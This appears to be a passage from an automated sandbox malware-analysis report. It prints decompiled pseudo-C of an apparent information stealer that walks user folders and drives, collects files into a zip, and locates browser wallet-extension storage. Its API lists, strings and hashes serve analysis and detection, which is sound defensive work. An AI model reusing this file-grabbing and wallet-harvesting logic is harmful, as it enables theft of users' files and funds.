                                                                                							_t203 = _t175;
                                                                                							_v6680 = 0;
                                                                                							_v6668 = 0;
                                                                                							if(_a36 != 0 && PathMatchSpecA( &(_v6656.cFileName), "*.lnk") != 0) {
                                                                                								_v6668 = 1;
                                                                                								 *0x44a1d0(0);
                                                                                								E00409126( &_v280,  &_v808);
                                                                                								_pop(_t196);
                                                                                								 *0x44a1c0();
                                                                                							}
                                                                                							if(_t203 == 0) {
                                                                                								L20:
                                                                                								_push(_v6664);
                                                                                								if(_v6668 == 0) {
                                                                                									_t177 = PathMatchSpecA( &(_v6656.cFileName));
                                                                                									__eflags = _t177;
                                                                                									if(_t177 == 0) {
                                                                                										goto L39;
                                                                                									}
                                                                                									_push(_v6676);
                                                                                									L28:
                                                                                									 *0x44a220( &_v544);
                                                                                									 *0x44a1b8( &_v544, _t202);
                                                                                									 *0x44a1b8( &_v544,  &(_v6656.cFileName));
                                                                                									_t149 = E00428980(E0041786A(_t196,  &_v280), _t201, 0x3e8, 0);
                                                                                									__eflags = _t149 - _a24;
                                                                                									if(_t149 >= _a24) {
                                                                                										goto L39;
                                                                                									}
                                                                                									_push(2);
                                                                                									_t196 =  &_v280;
                                                                                									_push(0);
                                                                                									__eflags = _a32;
                                                                                									if(_a32 == 0) {
                                                                                										L37:
                                                                                										_t150 =  &_v544;
                                                                                										L38:
                                                                                										_push(_t150);
                                                                                										E0041D315(_v6660);
                                                                                										_t207 = _t207 + 0xc;
                                                                                										goto L39;
                                                                                									}
                                                                                									_t150 =  &_v280;
                                                                                									goto L38;
                                                                                								}
                                                                                								if(PathMatchSpecA( &_v808) == 0) {
                                                                                									goto L39;
                                                                                								}
                                                                                								_push(_v6676);
                                                                                								L23:
                                                                                								 *0x44a220( &_v544);
                                                                                								 *0x44a1b8( &_v544, _t202);
                                                                                								 *0x44a1b8( &_v544, PathFindFileNameA( &_v808));
                                                                                								if(E00428980(E0041786A(_t196,  &_v280), _t201, 0x3e8, 0) >= _a24) {
                                                                                									goto L39;
                                                                                								}
                                                                                								_push(2);
                                                                                								_t196 =  &_v808;
                                                                                								_push(0);
                                                                                								if(_a32 == 0) {
                                                                                									goto L37;
                                                                                								}
                                                                                								_t150 =  &_v808;
                                                                                								goto L38;
                                                                                							} else {
                                                                                								do {
                                                                                									_push(0);
                                                                                									_push(_t203);
                                                                                									_t180 =  &_v808;
                                                                                									if(_v6668 == 0) {
                                                                                										_t180 =  &(_v6656.cFileName);
                                                                                									}
                                                                                									_push(_t180);
                                                                                									if( *0x44a170() != 0) {
                                                                                										_v6680 = 1;
                                                                                									}
                                                                                									_t203 = E0041F145(0, _t201, _t202, 0, ":",  &_v6684);
                                                                                									_t207 = _t207 + 0xc;
                                                                                								} while (_t203 != 0);
                                                                                								if(_v6680 != 0) {
                                                                                									L39:
                                                                                									if(_a20 != 0) {
                                                                                										E0040950A(_t201, _v6660,  &_v1072,  &_v280, _v6664, _a20, _a24, _v6688, _a32, _a36);
                                                                                										_t207 = _t207 + 0x24;
                                                                                									}
                                                                                									goto L41;
                                                                                								}
                                                                                								goto L20;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t209 = _t207 - 0x1c;
                                                                                					_t196 = _t209;
                                                                                					_v6668 = _t209;
                                                                                					 *((intOrPtr*)(_t196 + 0x14)) = 0xf;
                                                                                					 *((intOrPtr*)(_t196 + 0x10)) = 0;
                                                                                					 *_t196 = 0;
                                                                                					E0040381A(_t196,  &_v280);
                                                                                					_t194 = E00409245(0, _t196, _t202, _t203, _t213);
                                                                                					_t207 = _t209 + 0x1c;
                                                                                					if(_t194 != 0) {
                                                                                						goto L41;
                                                                                					}
                                                                                					goto L6;
                                                                                					L41:
                                                                                				} while (FindNextFileA(_v6672,  &_v6656) != 0);
                                                                                				_t112 = FindClose(_v6672);
                                                                                				goto L43;
                                                                                			}













































                                                                                0x0040950a
                                                                                0x00409512
                                                                                0x00409517
                                                                                0x0040951e
                                                                                0x00409524
                                                                                0x00409528
                                                                                0x00409532
                                                                                0x00409535
                                                                                0x0040953b
                                                                                0x00409540
                                                                                0x00409552
                                                                                0x00409558
                                                                                0x0040955e
                                                                                0x00409580
                                                                                0x00409590
                                                                                0x00409595
                                                                                0x004095a0
                                                                                0x004095ad
                                                                                0x00409996
                                                                                0x004099a4
                                                                                0x004099a4
                                                                                0x004095b3
                                                                                0x004095b8
                                                                                0x004095b8
                                                                                0x004095c3
                                                                                0x004095cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004095d2
                                                                                0x004095dd
                                                                                0x004095e6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004095f9
                                                                                0x00409607
                                                                                0x0040961b
                                                                                0x00409621
                                                                                0x00409624
                                                                                0x00409659
                                                                                0x00409666
                                                                                0x0040966b
                                                                                0x00409671
                                                                                0x0040967a
                                                                                0x00409688
                                                                                0x0040968f
                                                                                0x004096a2
                                                                                0x004096a9
                                                                                0x004096af
                                                                                0x00409691
                                                                                0x00409697
                                                                                0x0040969d
                                                                                0x0040969d
                                                                                0x004096c2
                                                                                0x004098aa
                                                                                0x004098ad
                                                                                0x00409904
                                                                                0x00409911
                                                                                0x00409917
                                                                                0x00409919
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040991b
                                                                                0x00000000
                                                                                0x0040991b
                                                                                0x004098bb
                                                                                0x004098c1
                                                                                0x004098c3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004098c6
                                                                                0x004098da
                                                                                0x004098e0
                                                                                0x004098e1
                                                                                0x004098f4
                                                                                0x004098fa
                                                                                0x004098fc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004098fe
                                                                                0x00000000
                                                                                0x004096c8
                                                                                0x004096db
                                                                                0x004096e0
                                                                                0x004096e3
                                                                                0x004096e5
                                                                                0x004096eb
                                                                                0x004096f4
                                                                                0x0040970d
                                                                                0x00409717
                                                                                0x0040972b
                                                                                0x00409731
                                                                                0x00409732
                                                                                0x00409732
                                                                                0x0040973a
                                                                                0x0040978e
                                                                                0x0040978e
                                                                                0x0040979a
                                                                                0x00409833
                                                                                0x00409839
                                                                                0x0040983b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409841
                                                                                0x00409847
                                                                                0x0040984e
                                                                                0x0040985c
                                                                                0x00409870
                                                                                0x0040988a
                                                                                0x0040988f
                                                                                0x00409892
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409898
                                                                                0x0040989a
                                                                                0x004098a0
                                                                                0x004098a1
                                                                                0x004098a4
                                                                                0x00409921
                                                                                0x00409921
                                                                                0x00409927
                                                                                0x00409927
                                                                                0x0040992e
                                                                                0x00409933
                                                                                0x00000000
                                                                                0x00409933
                                                                                0x004098a6
                                                                                0x00000000
                                                                                0x004098a6
                                                                                0x004097af
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004097b5
                                                                                0x004097bb
                                                                                0x004097c2
                                                                                0x004097d0
                                                                                0x004097eb
                                                                                0x0040980d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409813
                                                                                0x00409815
                                                                                0x0040981b
                                                                                0x0040981f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409825
                                                                                0x00000000
                                                                                0x0040973c
                                                                                0x0040973c
                                                                                0x0040973c
                                                                                0x0040973d
                                                                                0x0040973e
                                                                                0x0040974a
                                                                                0x0040974c
                                                                                0x0040974c
                                                                                0x00409752
                                                                                0x0040975b
                                                                                0x0040975d
                                                                                0x0040975d
                                                                                0x00409779
                                                                                0x0040977b
                                                                                0x0040977e
                                                                                0x00409788
                                                                                0x00409936
                                                                                0x00409939
                                                                                0x00409967
                                                                                0x0040996c
                                                                                0x0040996c
                                                                                0x00000000
                                                                                0x00409939
                                                                                0x00000000
                                                                                0x00409788
                                                                                0x0040973a
                                                                                0x004096c2
                                                                                0x00409626
                                                                                0x00409629
                                                                                0x00409631
                                                                                0x00409637
                                                                                0x0040963e
                                                                                0x00409642
                                                                                0x00409644
                                                                                0x00409649
                                                                                0x0040964e
                                                                                0x00409653
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040996f
                                                                                0x00409982
                                                                                0x00409990
                                                                                0x00000000

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040955E
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00409575
                                                                                • _memset.LIBCMT ref: 00409590
                                                                                • lstrcat.KERNEL32(?,?), ref: 004095A0
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4), ref: 004095C4
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8), ref: 004095DE
                                                                                • lstrcpy.KERNEL32(?,?), ref: 004095F9
                                                                                • lstrcat.KERNEL32(?,00440C98), ref: 00409607
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040961B
                                                                                • _memset.LIBCMT ref: 00409666
                                                                                • StrCmpCA.SHLWAPI(?,0043E028), ref: 0040967A
                                                                                • wsprintfA.USER32 ref: 00409697
                                                                                • wsprintfA.USER32 ref: 004096A9
                                                                                • lstrlenA.KERNEL32(?), ref: 004096B9
                                                                                • _strtok_s.LIBCMT ref: 004096DB
                                                                                • PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 00409702
                                                                                • CoInitialize.OLE32 ref: 00409717
                                                                                • _strtok_s.LIBCMT ref: 00409774
                                                                                • PathMatchSpecA.SHLWAPI(?,?), ref: 004097A7
                                                                                • lstrcpy.KERNEL32(?,?), ref: 004097C2
                                                                                • lstrcat.KERNEL32(?,00440C98), ref: 004097D0
                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 004097DD
                                                                                  • Part of subcall function 00409245: __EH_prolog3_GS.LIBCMT ref: 0040924C
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00409805
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004097EB
                                                                                  • Part of subcall function 0041786A: CreateFileA.KERNEL32(00409882,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00409882,?), ref: 00417885
                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040997C
                                                                                • FindClose.KERNEL32(000000FF), ref: 00409990
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$FileFind$Pathwsprintf$MatchSpec_memset_strtok_slstrcpy$CloseCreateFirstH_prolog3_InitializeNameNextUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                • String ID: %s\%s$%s\*$*.lnk
                                                                                • API String ID: 2039857820-1856930566
                                                                                • Opcode ID: c715d0849cbfd78dc485a5ed7cef114537927fbfebd13899c72260d89656cfdd
                                                                                • Instruction ID: ffd5a65dbea6979628a0b3f2831f0eb712396430546a499d59bf8078b44b5aaa
                                                                                • Opcode Fuzzy Hash: c715d0849cbfd78dc485a5ed7cef114537927fbfebd13899c72260d89656cfdd
                                                                                • Instruction Fuzzy Hash: DDC16DB694121CABCF209FA1DC889DA77BCAB09345F0440FAF609F2141D7389E948F5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: ___getlocaleinfo
                                                                                • String ID:
                                                                                • API String ID: 1937885557-0
                                                                                • Opcode ID: d13b5c3e743950fe39b2a30715bba3b8edb0f126fc253a796b476166ec161c68
                                                                                • Instruction ID: e5b7519e40994130e68474c1778b5d372f743d89950e1e317f7f66a1496f7485
                                                                                • Opcode Fuzzy Hash: d13b5c3e743950fe39b2a30715bba3b8edb0f126fc253a796b476166ec161c68
                                                                                • Instruction Fuzzy Hash: 40E1DEF294021DBEEB11DAF1CC81EFF77BDEF14744F04492AB21AD2081EA70AA159760
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 29%
                                                                                			E004099F2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                				signed int _v8;
                                                                                				char _v276;
                                                                                				char _v540;
                                                                                				char _v644;
                                                                                				char _v908;
                                                                                				intOrPtr _v912;
                                                                                				intOrPtr* _v916;
                                                                                				intOrPtr _v920;
                                                                                				intOrPtr _v924;
                                                                                				intOrPtr _v928;
                                                                                				intOrPtr _v932;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t69;
                                                                                				void* _t86;
                                                                                				void* _t123;
                                                                                				signed int _t130;
                                                                                				signed int _t132;
                                                                                				void* _t133;
                                                                                				int _t137;
                                                                                				void* _t142;
                                                                                				void* _t176;
                                                                                				void* _t181;
                                                                                				void* _t182;
                                                                                				void* _t183;
                                                                                				signed int _t187;
                                                                                				intOrPtr* _t188;
                                                                                				signed int _t190;
                                                                                				void* _t191;
                                                                                				void* _t195;
                                                                                				void* _t197;
                                                                                
                                                                                				_t197 = __eflags;
                                                                                				_t182 = __edx;
                                                                                				_t69 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t69 ^ _t190;
                                                                                				_v928 = _a8;
                                                                                				_v924 = _a12;
                                                                                				_t189 = 0x104;
                                                                                				_v920 = _a20;
                                                                                				_t183 = __ecx;
                                                                                				E00427E30( &_v908, 0, 0x104);
                                                                                				E00427E30( &_v276, 0, 0x104);
                                                                                				E00427E30( &_v540, 0, 0x104);
                                                                                				 *0x44a1b8( &_v908, _t183);
                                                                                				 *0x44a1b8( &_v908, ".zip");
                                                                                				_v916 = E0041D251(0, 0, 0x104, _t197);
                                                                                				_v912 = 0;
                                                                                				_v932 = 0;
                                                                                				_t86 = E00417B72(0, 0, 0x104, 0x1a);
                                                                                				_t195 = _t191 + 0x30;
                                                                                				 *0x44a220( &_v276, E004171D3(_v928, "%APPDATA%"), _t86,  &_v908, 2);
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%LOCALAPPDATA%"), E00417B72(0, 0, 0x104, 0x1c));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%USERPROFILE%"), E00417B72(0, 0, _t189, 0x28));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%DESKTOP%"), E00417B72(0, 0, _t189, 0x10));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%DOCUMENTS%"), E00417B72(0, 0, _t189, 5));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%PROGRAMFILES%"), E00417B72(0, 0, _t189, 0x26));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%PROGRAMFILES_86%"), E00417B72(0, 0, _t189, 0x2a));
                                                                                				_push(E00417B72(0, 0, _t189, 8));
                                                                                				_t123 = E004171D3( &_v276, "%RECENT%");
                                                                                				_pop(_t176);
                                                                                				 *0x44a220( &_v276, _t123);
                                                                                				_push(0);
                                                                                				_push("*%DRIVE_FIXED%*");
                                                                                				_push( &_v276);
                                                                                				if( *0x44a170() != 0) {
                                                                                					_v912 = 1;
                                                                                				}
                                                                                				_push(0);
                                                                                				_push("*%DRIVE_REMOVABLE%*");
                                                                                				_push( &_v276);
                                                                                				if( *0x44a170() != 0) {
                                                                                					_v912 = 1;
                                                                                					_v932 = 1;
                                                                                				}
                                                                                				_t130 =  *0x44a170(_v928, "*%RECENT%*", 0);
                                                                                				asm("sbb edi, edi");
                                                                                				_t187 =  ~( ~_t130);
                                                                                				if(_v912 == 0) {
                                                                                					_t132 = E004099A5(0, _t176, _t187, __eflags, _v924,  &_v276, _v916, _a16, _a4, _v920, 0, _t187);
                                                                                				} else {
                                                                                					_t132 = GetLogicalDriveStringsA(0x64,  &_v644);
                                                                                					_t189 =  &_v644;
                                                                                					if(_v644 != 0) {
                                                                                						do {
                                                                                							_t137 = GetDriveTypeA(_t189);
                                                                                							if(_v932 == 0) {
                                                                                								L9:
                                                                                								 *0x44a220( &_v540,  &_v276);
                                                                                								_push(_t189);
                                                                                								_push("%DRIVE_FIXED%");
                                                                                							} else {
                                                                                								_t204 = _t137 - 2;
                                                                                								if(_t137 != 2) {
                                                                                									goto L9;
                                                                                								} else {
                                                                                									 *0x44a220( &_v540,  &_v276);
                                                                                									_push(_t189);
                                                                                									_push("%DRIVE_REMOVABLE%");
                                                                                								}
                                                                                							}
                                                                                							_t142 = E004171D3( &_v540);
                                                                                							_pop(_t181);
                                                                                							 *0x44a220( &_v540, _t142);
                                                                                							E004099A5(0, _t181, _t187, _t204, _v924,  &_v540, _v916, _a16, _a4, _v920, _v912, _t187);
                                                                                							_t195 = _t195 + 0x20;
                                                                                							_t132 = lstrlenA(_t189);
                                                                                							_t189 =  &(_t189[_t132 + 1]);
                                                                                						} while ( *_t189 != 0);
                                                                                					}
                                                                                				}
                                                                                				_t188 = _v916;
                                                                                				if(_t188 == 0 || (_t132 & 0xffffff00 |  *_t188 == 0x00000001) == 0) {
                                                                                					_t133 = E0041D357(_t188);
                                                                                				} else {
                                                                                					_t133 = E00407C94(_t189, _t188);
                                                                                				}
                                                                                				return E0041DEB4(_t133, 0, _v8 ^ _t190, _t182, _t188, _t189);
                                                                                			}




































                                                                                0x004099f2
                                                                                0x004099f2
                                                                                0x004099fb
                                                                                0x00409a02
                                                                                0x00409a0a
                                                                                0x00409a14
                                                                                0x00409a1d
                                                                                0x00409a23
                                                                                0x00409a33
                                                                                0x00409a35
                                                                                0x00409a46
                                                                                0x00409a57
                                                                                0x00409a67
                                                                                0x00409a79
                                                                                0x00409a91
                                                                                0x00409a97
                                                                                0x00409a9d
                                                                                0x00409aa3
                                                                                0x00409aa8
                                                                                0x00409ac6
                                                                                0x00409aef
                                                                                0x00409b18
                                                                                0x00409b41
                                                                                0x00409b6a
                                                                                0x00409b93
                                                                                0x00409bbc
                                                                                0x00409bca
                                                                                0x00409bd6
                                                                                0x00409bdc
                                                                                0x00409be5
                                                                                0x00409beb
                                                                                0x00409bec
                                                                                0x00409bf7
                                                                                0x00409c00
                                                                                0x00409c02
                                                                                0x00409c02
                                                                                0x00409c0c
                                                                                0x00409c0d
                                                                                0x00409c18
                                                                                0x00409c21
                                                                                0x00409c26
                                                                                0x00409c2c
                                                                                0x00409c2c
                                                                                0x00409c3e
                                                                                0x00409c48
                                                                                0x00409c4a
                                                                                0x00409c52
                                                                                0x00409d42
                                                                                0x00409c58
                                                                                0x00409c61
                                                                                0x00409c67
                                                                                0x00409c73
                                                                                0x00409c79
                                                                                0x00409c7a
                                                                                0x00409c86
                                                                                0x00409ca9
                                                                                0x00409cb7
                                                                                0x00409cbd
                                                                                0x00409cbe
                                                                                0x00409c88
                                                                                0x00409c88
                                                                                0x00409c8b
                                                                                0x00000000
                                                                                0x00409c8d
                                                                                0x00409c9b
                                                                                0x00409ca1
                                                                                0x00409ca2
                                                                                0x00409ca2
                                                                                0x00409c8b
                                                                                0x00409cc9
                                                                                0x00409ccf
                                                                                0x00409cd8
                                                                                0x00409d04
                                                                                0x00409d09
                                                                                0x00409d0d
                                                                                0x00409d13
                                                                                0x00409d17
                                                                                0x00409d1f
                                                                                0x00409c73
                                                                                0x00409d4a
                                                                                0x00409d52
                                                                                0x00409d67
                                                                                0x00409d5e
                                                                                0x00409d5f
                                                                                0x00409d64
                                                                                0x00409d7a

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00409A35
                                                                                • _memset.LIBCMT ref: 00409A46
                                                                                • _memset.LIBCMT ref: 00409A57
                                                                                • lstrcat.KERNEL32(?), ref: 00409A67
                                                                                • lstrcat.KERNEL32(?,.zip), ref: 00409A79
                                                                                  • Part of subcall function 0041D251: __EH_prolog3.LIBCMT ref: 0041D258
                                                                                  • Part of subcall function 00417B72: _memset.LIBCMT ref: 00417B93
                                                                                  • Part of subcall function 00417B72: SHGetFolderPathA.SHELL32(00000000,00000002,00000000,00000000,?), ref: 00417BAB
                                                                                  • Part of subcall function 004171D3: StrStrA.SHLWAPI(?,00409ABC,00000104,00000000,00409ABC,%APPDATA%,00000000), ref: 004171DC
                                                                                  • Part of subcall function 004171D3: lstrcpynA.KERNEL32(0044A450,?,00000000,00000000), ref: 004171F5
                                                                                  • Part of subcall function 004171D3: wsprintfA.USER32 ref: 00417221
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409AC6
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409AEF
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409B18
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409B41
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409B6A
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409B93
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409BBC
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409BE5
                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00409C61
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 00409C7A
                                                                                • lstrcpy.KERNEL32(?,?), ref: 00409C9B
                                                                                • lstrcpy.KERNEL32(?,?), ref: 00409CB7
                                                                                  • Part of subcall function 004099A5: _strtok_s.LIBCMT ref: 004099E3
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409CD8
                                                                                • lstrlenA.KERNEL32(?), ref: 00409D0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpy$_memset$Drivelstrcat$FolderH_prolog3LogicalPathStringsType_strtok_slstrcpynlstrlenwsprintf
                                                                                • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$*%RECENT%*$.zip
                                                                                • API String ID: 3100847841-1612159102
                                                                                • Opcode ID: 0a2501d2ad76a45b82fbd9b8ed816edf00a6a0b3f89f10aae08af88ada6ea9df
                                                                                • Instruction ID: 7df28f63952bef75c9b69aabc1cc39a606bfe1fa0181df622ddb134d054c93b0
                                                                                • Opcode Fuzzy Hash: 0a2501d2ad76a45b82fbd9b8ed816edf00a6a0b3f89f10aae08af88ada6ea9df
                                                                                • Instruction Fuzzy Hash: F7917372D4421CAFEB159B90DC4AEEA77BDFB09304F1004ABF208A2191DAB59FD48F55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$FileFind_memset$CloseCopyFirstH_prolog3H_prolog3_Nextwsprintf
                                                                                • String ID: %s\*$Plugins$Wallets$\files\
                                                                                • API String ID: 2810030407-2671555165
                                                                                • Opcode ID: f5633556d795729b159d8ee091ff9f2f297195aea18512963beece4d6e863d2d
                                                                                • Instruction ID: eb93aab47b2980ae96ce8e3c1833348d0c4586612727bdcd52a1e8fbdb9bdf17
                                                                                • Opcode Fuzzy Hash: f5633556d795729b159d8ee091ff9f2f297195aea18512963beece4d6e863d2d
                                                                                • Instruction Fuzzy Hash: A461FAB290022CAFCB64DFA0DD89EDA777CAB09705F0444E6B609E2051DA349BD9CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00412D6E(void* __ebx, intOrPtr __ecx, CHAR* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t85;
                                                                                				intOrPtr _t98;
                                                                                				signed char _t121;
                                                                                				signed char _t123;
                                                                                				signed char _t125;
                                                                                				void* _t138;
                                                                                				void* _t149;
                                                                                				void* _t150;
                                                                                				intOrPtr _t151;
                                                                                				void* _t152;
                                                                                
                                                                                				_t146 = __edi;
                                                                                				_t140 = __ebx;
                                                                                				_push(0x9a0);
                                                                                				E004219DE(E00436A5F, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t149 - 0x99c)) =  *((intOrPtr*)(_t149 + 8));
                                                                                				 *((intOrPtr*)(_t149 - 0x998)) =  *((intOrPtr*)(_t149 + 0xc));
                                                                                				 *((intOrPtr*)(_t149 - 0x9a0)) =  *((intOrPtr*)(_t149 + 0x10));
                                                                                				_t148 = __ecx;
                                                                                				 *((intOrPtr*)(_t149 - 0x9ac)) = __ecx;
                                                                                				 *((intOrPtr*)(_t149 - 0x994)) =  *((intOrPtr*)(_t149 + 0x14));
                                                                                				 *(_t149 - 4) =  *(_t149 - 4) & 0x00000000;
                                                                                				wsprintfA(_t149 - 0x538, "%s\\*.*", __ecx);
                                                                                				_t151 = _t150 + 0xc;
                                                                                				_t85 = FindFirstFileA(_t149 - 0x538, _t149 - 0x990);
                                                                                				 *(_t149 - 0x9a8) = _t85;
                                                                                				if(_t85 == 0xffffffff) {
                                                                                					L23:
                                                                                					E00402C34(_t149 + 0x1c, 1, 0);
                                                                                					return E00421A61(_t140, _t146, _t148);
                                                                                				} else {
                                                                                					_t140 = GetFileAttributesA;
                                                                                					_t146 = "%s\\CURRENT";
                                                                                					goto L3;
                                                                                					L4:
                                                                                					_push("..");
                                                                                					_push(_t149 - 0x964);
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L21;
                                                                                					}
                                                                                					E00427E30(_t149 - 0x118, 0, 0x104);
                                                                                					_t152 = _t151 + 0xc;
                                                                                					_t98 =  *((intOrPtr*)(_t149 + 0x38));
                                                                                					if(_t98 == 0) {
                                                                                						_push(_t149 - 0x964);
                                                                                						L11:
                                                                                						 *0x44a1b8(_t149 - 0x118);
                                                                                						L12:
                                                                                						wsprintfA(_t149 - 0x220, "%s\\%s\\Local Extension Settings\\%s", _t148, _t149 - 0x118,  *((intOrPtr*)(_t149 - 0x998)));
                                                                                						wsprintfA(_t149 - 0x640, _t146, _t149 - 0x220);
                                                                                						wsprintfA(_t149 - 0x430, "%s\\%s\\Sync Extension Settings\\%s", _t148, _t149 - 0x118,  *((intOrPtr*)(_t149 - 0x998)));
                                                                                						wsprintfA(_t149 - 0x748, _t146, _t149 - 0x430);
                                                                                						wsprintfA(_t149 - 0x328, "%s\\%s\\IndexedDB\\chrome-extension_%s_0.indexeddb.leveldb", _t148, _t149 - 0x118,  *((intOrPtr*)(_t149 - 0x998)));
                                                                                						wsprintfA(_t149 - 0x850, _t146, _t149 - 0x328);
                                                                                						_t151 = _t152 + 0x60;
                                                                                						_t121 = GetFileAttributesA(_t149 - 0x640);
                                                                                						if(_t121 != 0xffffffff) {
                                                                                							_t166 = _t121 & 0x00000010;
                                                                                							if((_t121 & 0x00000010) == 0) {
                                                                                								_t151 = _t151 - 0x1c;
                                                                                								_t148 = _t151;
                                                                                								 *((intOrPtr*)(_t149 - 0x9a4)) = _t151;
                                                                                								E0040410F(_t151, _t149 + 0x1c);
                                                                                								_push( *((intOrPtr*)(_t149 + 0x18)));
                                                                                								_push(_t149 - 0x118);
                                                                                								_push( *((intOrPtr*)(_t149 - 0x994)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x9a0)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x99c)));
                                                                                								E00412AE1(_t140, _t149 - 0x220, _t146, _t151, _t166);
                                                                                							}
                                                                                						}
